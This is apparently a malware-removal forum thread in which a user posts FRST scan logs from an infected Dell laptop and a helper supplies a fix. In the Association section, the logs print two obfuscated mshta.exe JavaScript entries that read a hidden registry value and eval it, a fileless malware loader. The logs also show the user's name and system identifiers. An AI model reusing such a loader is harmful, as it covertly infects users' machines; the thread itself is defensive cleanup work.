Cisco EAP-FAST Module (x32 Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (x32 Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (x32 Version: 1.1.6 - Cisco Systems, Inc.) Hidden
CyberLink Media Suite Essentials (HKLM-x32\...\InstallShield_{8F14AA37-5193-4A14-BD5B-BDF9B361AEF7}) (Version: 10.0 - CyberLink Corp.)
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.9.2.8 - Dell Inc.)
Dell Customer Connect (HKLM-x32\...\{2A07BB79-284C-4C61-B8D5-4E146FAC91FB}) (Version: 1.0.0.8 - Dell Inc.)
Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP)
Dell Foundation Services (HKLM\...\{AE5E3C86-2633-4DAF-A7F4-C43D1E738BAE}) (Version: 3.1.3300.0 - Dell Inc.)
Dell Product Registration (HKLM-x32\...\{17FFE63C-6734-4950-B488-134B5A2505F7}) (Version: 2.04.0280 - Aviata Inc.)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 18.1.34.40 - Synaptics Incorporated)
Dell Update (HKLM-x32\...\{DB82968B-57A4-4397-81A5-ECAB21B5DFCD}) (Version: 1.7.1015.0 - Dell Inc.)
Dropbox 20 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 0.9.0 - Dropbox, Inc.)
DSC/AA Factory Installer (Version: 3.5.6426.22 - PC-Doctor, Inc.) Hidden
DW WLAN Card (HKLM\...\DW WLAN Card) (Version: 6.30.223.249 - Dell Inc.)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3945 - Intel Corporation)
McAfee AntiVirus (HKLM-x32\...\MSC) (Version: 14.0.9042 - McAfee, Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\OneDriveSetup.exe) (Version: 17.3.6390.0509 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
My Dell Learning Center (HKLM\...\{DC451A89-545E-4297-AC2C-9F239CE7D695}) (Version: 1.0.510.0 - Dell Inc.)
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.18 - Dell Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9600.39054 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7288 - Realtek Semiconductor Corp.)
WIDCOMM Bluetooth Software (HKLM\...\{C6D9ED03-6FCF-4410-9CB7-45CA285F9E11}) (Version: 12.0.0.9980 - Broadcom Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Melinda\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\FileCoAuthLib64.dll => No Fil (the data entry has 1 more characters).
CustomCLSID: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Melinda\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\FileCoAuth.exe => No File

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {2362FB59-156D-4BDE-BDE5-26155C688609} - System32\Tasks\RtHDVBg_PushButton => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2014-07-05] (Realtek Semiconductor)
Task: {31B9C7D7-07AF-4C60-8D5C-22F4E164D916} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {35276823-28FA-4B1D-A581-AEFDA66847C0} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2013-03-22] (CyberLink Corp.)
Task: {3758DF87-0E29-486A-9D29-63718D338695} - System32\Tasks\Dell\Dell Product Registration Update => C:\Program Files (x86)\Dell Product Registration\prodreg.exe [2014-04-01] (Aviata Inc)
Task: {3F26D171-C361-4616-B754-E0147B333FF5} - System32\Tasks\Dell\Dell Product Registration => C:\Program Files (x86)\Dell Product Registration\prodreg.exe [2014-04-01] (Aviata Inc)
Task: {583C724D-DC81-4886-9B12-752F09269FF2} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\mcafee\platform\McUICnt.exe [2016-04-23] (McAfee, Inc.)
Task: {6FE5AA89-8DE2-40BA-B60E-9AED6F64693F} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {7FFABFC7-6E75-48D4-80F9-F8C8DD52D5AF} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\My Dell\uaclauncher.exe [2014-01-11] (PC-Doctor, Inc.)
Task: {B4B694C2-6A51-4D72-BA7B-BEEBAD2B8856} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2013-03-05] (CyberLink)
Task: {DA28AAC1-0DC1-4DFD-ACF4-024C75A6E47E} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-11] (PC-Doctor, Inc.)
Task: {DD6537A5-A686-4071-B1C0-3AB7EE5B2110} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2016-03-31] (McAfee, Inc.)
Task: {EC51E01A-E785-4E5F-848B-388C16A74DCC} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2015-01-10] (Synaptics Incorporated)
Task: {F3895D47-C5D5-4BA6-8A33-293D270553E0} - System32\Tasks\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337 => C:\Windows\TEMP\DeleteFolderTask.exe [2016-07-06] () <==== ATTENTION
Task: {FFE8401F-7883-442B-944A-693A8A7FE7B7} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2014-09-24 22:20 - 2014-09-24 22:20 - 00049408 _____ () C:\Program Files\WIDCOMM\Bluetooth Software\btwleapi.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00022528 _____ () C:\Program Files\Dell\My Dell Learning Center\MDLCSvc.exe
2015-01-22 23:37 - 2015-01-22 23:37 - 06032384 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.Agent.Plugins.BeautyShot.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00045568 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.Agent.Plugins.ContentManager.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00017408 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.ContentManager.Common.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00009728 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.ContentManager.Configuration.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00017920 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.BeautyShot.Common.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00006656 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.BeautyShot.Configuration.dll
2014-09-02 18:40 - 2014-09-02 18:40 - 00462160 _____ () C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe
2015-06-07 15:06 - 2013-12-10 17:27 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2014-09-02 18:40 - 2014-09-02 18:40 - 00214352 _____ () C:\Program Files (x86)\Dropbox\DropboxOEM\Ledger.dll
2014-09-02 18:40 - 2014-09-02 18:40 - 00114000 _____ () C:\Program Files (x86)\Dropbox\DropboxOEM\zlib1.dll
2015-06-07 14:58 - 2013-03-05 05:40 - 00626240 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2013-03-05 18:41 - 2013-03-05 18:41 - 00015424 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
2015-03-16 11:28 - 2015-03-16 11:28 - 00155528 _____ () C:\Program Files (x86)\Dell Digital Delivery\ServiceTagPlusPlus.dll
2016-01-05 19:17 - 2015-12-19 01:52 - 01607920 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\STRestoreAPI.dll
2015-06-07 15:20 - 2012-11-26 05:19 - 01153384 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\libxml2.dll
2015-06-07 15:19 - 2014-02-18 21:12 - 00117568 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\zlib1.dll

==================== Alternate Data Streams (Whitelisted) =========

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\Software\Classes\2c6da: "C:\Windows\system32\mshta.exe" "javascript:XB32SHUaV="5u2FH";lG0=new ActiveXObject("WScript.Shell");nsW7srGo="L";jwIb4=lG0.RegRead("HKCU\\software\\fokfinshfo\\kblbsn");IgzjC4k6x="nxybEpT4";eval(jwIb4);bD5aKS7="pjTk";" <===== ATTENTION
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\Software\Classes\2e912: "C:\Windows\system32\mshta.exe" "javascript:uWaA9="Jopk0";Z9X=new ActiveXObject("WScript.Shell");yaIgQo4m="MVEsZ";hGX5P=Z9X.RegRead("HKCU\\software\\fokfinshfo\\kblbsn");GxfSc3J="aBFn";eval(hGX5P);fpt5V8hJp="pQBvV";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 15:25 - 2013-08-22 15:25 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\dell\BlueLava_1112000xx_inspiron_wallpaper58095_16x9_72dpi_RGB.jpg
DNS Servers: 192.168.43.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{4C08EABD-F39F-4DFE-BC62-A885074076A0}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDirector10\PDR10.EXE
FirewallRules: [{B1AEF5A5-BC60-420F-91A2-C4667097F18D}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD Cinema\PowerDVDCinema12.exe
FirewallRules: [{19E3C5FD-7368-411F-B10B-7BEF913EB8AE}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{B3B5A316-3040-4953-B2BE-76A614395690}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{D7B1A2E0-AA3B-4786-B557-351B04116EEE}] => (Allow) C:\Users\Melinda\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{D8426297-B91F-4EA5-B90C-961F0D036FEF}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{453DE781-1C77-4A11-9241-94E64E7C2586}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{15B1885B-E1A4-4E9F-95EE-072770B3A83F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{01D1F782-0259-4566-A237-B192FAF6E7F0}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{13FB821E-9FEE-4A0F-8DE3-9387CB447704}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{EC9FA691-E063-4647-BC4A-4767178AC238}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe
FirewallRules: [{A75DB17C-A945-438F-ACCF-FF579716F5F1}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe
FirewallRules: [{F7E58AA9-6B4D-41E1-BDAC-75A0FC8DA9BD}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{F9AEAE24-EC5B-4EB5-A672-C5E2F0DC979A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{B00CC2B1-DB54-432A-A099-3EE6AC06DCA0}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{A6643D8F-FF92-4964-AC6A-905B1D49FF70}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{6566F34D-CE0D-46FA-8939-42F3C461B65E}] => (Allow) C:\Program Files\BitComet\BitComet.exe
FirewallRules: [{58CDD88C-012F-47C2-8B07-68319DE5DB71}] => (Allow) C:\Program Files\BitComet\BitComet.exe
FirewallRules: [TCP Query User{161CA715-DC23-4B44-B509-22AAE82DD6FB}C:\program files (x86)\kodi\kodi.exe] => (Allow) C:\program files (x86)\kodi\kodi.exe
FirewallRules: [UDP Query User{CBF9CD12-1F76-4583-AA64-B05AFF1110F8}C:\program files (x86)\kodi\kodi.exe] => (Allow) C:\program files (x86)\kodi\kodi.exe
FirewallRules: [{59F538D1-BD40-4AAD-8FAC-ABA0A4531DE0}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{D777539B-2BA0-4B86-9B02-67EC1BD7FEF0}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{4610417F-63B7-47E2-8499-00D1BD39C1A1}] => (Allow) LPort=17061
FirewallRules: [{4FA72F00-0BC4-4FB5-9F0A-3424AA44D5B6}] => (Allow) LPort=17061
FirewallRules: [{8343E0A9-1541-4C05-8336-8E24C926455D}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{1D0FED7E-B603-43E3-B728-90DE466D8BF1}] => (Allow) C:\Windows\explorer.exe
FirewallRules: [{B448FF33-50E1-430E-A442-F801742453A7}] => (Allow) C:\Windows\system32\rundll32.exe

==================== Restore Points =========================

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (07/06/2016 07:55:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: IEXPLORE.EXE, version: 11.0.9600.17416, time stamp: 0x5452eed9
Faulting module name: Flash.ocx, version: 16.0.0.305, time stamp: 0x54d010d8
Exception code: 0xc0000005
Fault offset: 0x003379bf
Faulting process id: 0x2b8
Faulting application start time: 0xIEXPLORE.EXE0
Faulting application path: IEXPLORE.EXE1
Faulting module path: IEXPLORE.EXE2
Report Id: IEXPLORE.EXE3
Faulting package full name: IEXPLORE.EXE4
Faulting package-relative application ID: IEXPLORE.EXE5

Error: (07/06/2016 07:50:45 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80070005

Error: (07/06/2016 06:32:13 AM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Windows Search Service failed to process the list of included and excluded locations with the error <30, 0x80040d07, "mapi15://{S-1-5-21-3305678368-1645044794-3837945535-1001}/">.

Error: (07/06/2016 06:31:38 AM) (Source: Windows Search Service) (EventID: 7042) (User: )
Description: The Windows Search Service is being stopped because there is a problem with the indexer: The catalog is corrupt.

Details:
 The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (07/06/2016 06:31:38 AM) (Source: Windows Search Service) (EventID: 7040) (User: )
Description: The search service has detected corrupted data files in the index {id=4400}. The service will attempt to automatically correct this problem by rebuilding the index.

Details:
 The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (07/06/2016 06:31:38 AM) (Source: Windows Search Service) (EventID: 7010) (User: )
Description: The index cannot be initialized.

Details:
 The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (07/06/2016 06:31:38 AM) (Source: Windows Search Service) (EventID: 3058) (User: )
Description: The application cannot be initialized.

Context: Windows Application

Details:
 The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (07/06/2016 06:31:38 AM) (Source: Windows Search Service) (EventID: 3028) (User: )
Description: The gatherer object cannot be initialized.

Context: Windows Application, SystemIndex Catalog

Details:
 The content index catalog is corrupt.  (HRESULT : 0xc0041801) (0xc0041801)

Error: (07/06/2016 06:31:37 AM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: The plug-in in <Search.TripoliIndexer> cannot be initialized.

Context: Windows Application, SystemIndex Catalog

Details:
 The specified object cannot be found. Specify the name of an existing object.  (HRESULT : 0x80040d06) (0x80040d06)

Error: (07/06/2016 06:31:36 AM) (Source: Windows Search Service) (EventID: 3057) (User: )
Description: The plug-in manager <Search.TripoliIndexer> cannot be initialized.

Context: Windows Application

Details:
 (HRESULT : 0x8e5e0713) (0x8e5e0713)

System errors:
=============
Error: (07/06/2016 08:47:45 AM) (Source: DCOM) (EventID: 10010) (User: Mel)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (07/06/2016 08:47:15 AM) (Source: DCOM) (EventID: 10010) (User: Mel)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (07/06/2016 08:17:45 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {209500FC-6B45-4693-8871-6296C4843751}

Error: (07/06/2016 08:17:15 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {209500FC-6B45-4693-8871-6296C4843751}

Error: (07/06/2016 08:17:15 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Interactive Services Detection service terminated with the following error:
%%1 = Incorrect function.

Error: (07/06/2016 08:16:48 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Interactive Services Detection service terminated with the following error:
%%1 = Incorrect function.

Error: (07/06/2016 08:13:00 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The McAfee Boot Delay Start Service service failed to start due to the following error:
%%1053 = The service did not respond to the start or control request in a timely fashion.

Error: (07/06/2016 08:13:00 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the McAfee Boot Delay Start Service service to connect.

Error: (07/06/2016 08:12:19 AM) (Source: DCOM) (EventID: 10010) (User: Mel)
Description: {209500FC-6B45-4693-8871-6296C4843751}

Error: (07/06/2016 06:45:12 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

==================== Memory info ===========================

Processor: Intel® Core™ i3-4005U CPU @ 1.70GHz
Percentage of memory in use: 52%
Total physical RAM: 4000.18 MB
Available physical RAM: 1910.27 MB
Total Virtual: 4896.18 MB
Available Virtual: 2464.95 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:922.04 GB) (Free:889.71 GB) NTFS
Drive w: (WINRETOOLS) (Fixed) (Total:0.73 GB) (Free:0.4 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: E2DE1C3A)

Partition: GPT.

==================== End of Addition.txt ============================

 


  • 0

Advertisements


#2
RKinner

RKinner

    Malware Expert

  • Expert
  • 20,001 posts
  • MVP

Worthless McAfee.  Doesn't even completely remove the few malware infections it does find.

 

 
Download the attached fixlist.txt to the same location as FRST
 
Attached File  fixlist.txt   6.56KB   77 downloads
 
Run FRST and press Fix
A fix log will be generated please post that 
 
 
Run FRST again as before.  Make sure Addition.txt is checked and hit Scan.  Post both logs.
 
 

  • 0

#3
MelindavW

MelindavW

    New Member

  • Topic Starter
  • Member
  • Pip
  • 3 posts

Thanks so much, after the PC restarted I didn't get the RegSvr32 error message, But a window popped up with the following message:

"There was a problem starting C:\Users\Melinda\AppData\Local\Microsoft\Protect\protecthost.dll The specified module could not be found"

 

here are the new logs

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02-07-2016
Ran by Melinda (administrator) on MEL (06-07-2016 19:33:01)
Running from C:\Users\Melinda\Desktop
Loaded Profiles: Melinda (Available Profiles: Melinda & Administrator)
Platform: Windows 8.1 Single Language (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe
(McAfee, Inc.) C:\Program Files\mcafee\msc\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Intel Security) C:\Program Files\Common Files\mcafee\ClientAnalytics\McClientAnalytics.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\platform\McUICnt.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
() C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft) C:\Program Files (x86)\Dell Customer Connect\OTBSurvey.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe
(Dell Products, LP.) C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe
(Dell Inc.) C:\Program Files (x86)\Dell Update\DellUpService.exe
(Dell Inc.) C:\Program Files (x86)\Dell Update\DellUpTray.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFS.Common.Agent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\CSP\1.9.741.0\McCSPServiceHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\ModuleCore\ModuleCoreService.exe
() C:\Program Files\Dell\My Dell Learning Center\MDLCSvc.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7637208 2014-07-09] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1387736 2014-07-05] (Realtek Semiconductor)
HKLM\...\Run: [WavesSvc] => C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe [562264 2014-04-10] (Waves Audio Ltd.)
